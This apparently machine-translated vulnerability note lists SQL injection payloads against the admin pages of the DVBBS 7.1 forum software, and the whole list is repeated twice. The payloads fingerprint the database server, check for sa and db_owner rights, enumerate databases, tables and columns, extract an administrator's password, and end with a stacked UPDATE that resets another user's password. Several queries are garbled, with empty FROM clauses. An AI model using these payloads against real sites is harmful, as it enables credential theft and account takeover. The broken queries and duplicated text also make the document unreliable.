Vulnerability testing environment: DVBBS7.1 SQL
Affected documents
admin/
.....
Vulnerability exploit
(select @@version)>0 Get the version number of Windows
and user_name()='dbo' Determine whether the current system's connected user is sa
(select user_name())>0 explode the current system's connected user
(select db_name())>0 Get the currently connected database
(select IS_MEMBER('db_owner')) -Query the current user permissions of the database
(select count(*) from where name>1 and dbid=7) --Query all database names
(select top 1 name from where xtype='U') -Query the database table name
(select top 1 name from where xtype='U' and name not in ('web_Admin')) -Query all table names of the database
(select count(*) from where xtype='U' and name='web_Admin' and uid>(str(id))) -Query table name ID
(select top 1 name from where id=1125579048) -Query field name
(select top 1 name from where id=1125579048 and name not in('adminname')) -Query all field names
(select count(*) from .web_Admin where AdminName>1)-Query user
(select count(*) from .web_Admin where Adminpwd>1 and username='bluefire')-Query user bluefire password
;update .Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--
Affected documents
admin/
.....
Vulnerability exploit
(select @@version)>0 Get the version number of Windows
and user_name()='dbo' Determine whether the current system's connected user is sa
(select user_name())>0 explode the current system's connected user
(select db_name())>0 Get the currently connected database
(select IS_MEMBER('db_owner')) -Query the current user permissions of the database
(select count(*) from where name>1 and dbid=7) --Query all database names
(select top 1 name from where xtype='U') -Query the database table name
(select top 1 name from where xtype='U' and name not in ('web_Admin')) -Query all table names of the database
(select count(*) from where xtype='U' and name='web_Admin' and uid>(str(id))) -Query table name ID
(select top 1 name from where id=1125579048) -Query field name
(select top 1 name from where id=1125579048 and name not in('adminname')) -Query all field names
(select count(*) from .web_Admin where AdminName>1)-Query user
(select count(*) from .web_Admin where Adminpwd>1 and username='bluefire')-Query user bluefire password
;update .Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--